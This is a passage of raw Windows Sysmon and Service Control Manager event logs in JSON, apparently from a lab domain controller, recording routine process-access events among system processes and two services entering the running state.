{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2853,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.341\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010BD060500}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.341","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010BD060500}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76849,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Distributed Transaction Coordinator service entered the running state.","param1":"Distributed Transaction Coordinator","param2":"running","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2854,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.419\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.419","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2855,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.419\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.419","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2856,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.419\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.419","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2857,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.482\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010240C0500}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.482","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010240C0500}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2858,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.482\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010240C0500}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x103800\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.482","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010240C0500}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x103800","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2859,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.544\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010240C0500}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.544","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010240C0500}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76850,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The sppsvc service entered the running state.","param1":"sppsvc","param2":"running","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2860,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.560\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2808\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010240C0500}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.560","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"2808","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010240C0500}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2861,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.919\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 